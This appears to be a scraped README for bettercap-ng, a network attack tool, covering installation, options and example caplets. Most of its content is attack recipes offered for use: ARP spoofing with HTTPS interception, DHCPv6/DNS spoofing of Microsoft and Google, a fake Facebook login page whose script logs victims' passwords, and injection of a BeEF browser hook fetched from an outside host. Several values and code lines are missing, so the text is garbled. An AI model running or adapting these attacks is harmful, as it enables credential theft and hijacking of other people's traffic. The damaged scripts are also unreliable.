bettercap-ng – complete reimplementation of bettercap

bettercap-ng is a complete reimplementation of bettercap, the Swiss army knife for network attacks and monitoring. It is faster, stabler, smaller, easier to install and to use.

Using it with Docker

In this repository, BetterCAP is containerized using Alpine Linux – a security-oriented, lightweight Linux distribution based on musl libc and busybox. The resulting Docker image is relatively small and easy to manage the dependencies.
To pull latest BetterCAP version of the image:
$ docker pull evilsocket/bettercap-ng
To run:
$ docker run -it --privileged --net=host evilsocket/bettercap-ng -h


Make sure you have a correctly configured Go >= 1.8 environment, that $GOPATH/bin is in $PATH and the libpcap-dev package installed for your system, then:
$ go get
To show the command line options:
$ sudo bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
        Disable history file.
        Suppress all logs which are not errors.

Cross Compilation

As an example, let’s cross compile bettercap for ARM (requires gcc-arm-linux-gnueabibyacc and flex packages).
Step 1: download and cross compile libpcap-1.8.1 for ARM (adjust PCAPV to use a different libpcap version):
cd /tmp
export PCAPV=1.8.1
tar xvf libpcap-$PCAPV.tar.gz
cd libpcap-$PCAPV
export CC=arm-linux-gnueabi-gcc
./configure --host=arm-linux --with-pcap=linux
Step 2: now cross compile bettercap-ng itself:
cd $GOPATH/src/
env CC=arm-linux-gnueabi-gcc CGO_ENABLED=1 GOOS=linux GOARCH=arm CGO_LDFLAGS="-L/tmp/libpcap-$PCAPV" make

Command Line Options

By issuing bettercap-ng -h the main command line options will be shown:
Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
        Print debug messages.
  -eval string
        Run one or more commands separated by ; in the interactive session, used to set variables via command line.
  -iface string
        Network interface to bind to, if empty the default interface will be auto selected.
        Disable interactive session history file.
        Suppress all logs which are not errors.
If no -caplet option is specified, bettercap-ng will start in interactive mode.

Interactive Mode

By default, bettercap-ng will start in interactive mode, allowing you to start and stop modules manually, change options and apply new firewall rules on the fly, to show the help menu type help:

              help MODULE : List available commands or show module specific help if no module name is provided.
                   active : Show information about active modules.
                     quit : Close the session and exit.
            sleep SECONDS : Sleep for the given amount of seconds.
                 get NAME : Get the value of variable NAME, use * for all.
           set NAME VALUE : Set the VALUE of variable NAME.
                    clear : Clear the screen.
           include CAPLET : Load and run this caplet in the current session.
                ! COMMAND : Execute a shell command and print its output.
           alias MAC NAME : Assign an alias to a given endpoint given its MAC address.

        > not running
                arp.spoof > not running
              dhcp6.spoof > not running
                dns.spoof > not running
   > running
               http.proxy > not running
              http.server > not running
              https.proxy > not running
              mac.changer > not running
                net.probe > not running
                net.recon > running
                net.sniff > not running
                   ticker > not running
                      wol > not running
You can have module specific help by using help module-name (for instance try with help net.recon), to print all variables you can use get *.


Interactive sessions can be scripted with .cap files, or caplets, the following are a few basic examples, look the caplets folder for more.


Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dump.js proxy script.
# targeting the whole subnet by default, to make it selective:
#   sudo ./bettercap-ng -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets"

# to make it less verbose
# off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script caplets/http-req-dump.js
set http.proxy.script caplets/http-req-dump.js

# go ^_^
http.proxy on
https.proxy on
arp.spoof on


An example of how to use the ticker module, use this caplet to monitor activities on your network.
net.probe on
ticker on


Reroute IPv4 DNS requests by using DHCPv6 replies, start a HTTP server and DNS spoofer for and
# let's spoof Microsoft and Google ^_^

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen


Start a rest API.
# change these!
set bcap
set bcap
# set 8082

# actively probe network for new hosts
net.probe on

# enjoy /api/session and /api/events on
Get information about the current session:
curl -k --user bpcap:bcap https://bettercap-ip:8083/api/session
Execute a command in the current interactive session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'
Get last 50 events:
curl -k --user bpcap:bcap https://bettercap-ip:8083/api/events?n=50
Clear events:
curl -k --user bpcap:bcap -X DELETE https://bettercap-ip:8083/api/events


This caplet will create a fake Facebook login page on port 80, intercept login attempts using the http.proxy, print credentials and redirect the target to the real Facebook.
Make sure to create the folder first:
$ cd caplets/www/
$ make
set http.server.address
set http.server.path caplets/www/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on
The caplets/fb-phish.js proxy script file:
function onRequest(req, res) {
    if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
        var form = req.ParseForm();
        var email = form["email"] || "?", 
            pass  = form["pass"] || "?";

        log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );

        res.Status      = 301;
        res.Headers     = "Location:\n" +
                          "Connection: close";


Use a proxy script to inject a BEEF javascript hook:
# targeting the whole subnet by default, to make it selective:
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
The caplets/beef.inject.js proxy script file:
function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 


bettercap and bettercap-ng are made with ♥ by Simone Margaritelli and they’re released under the GPL 3 license.
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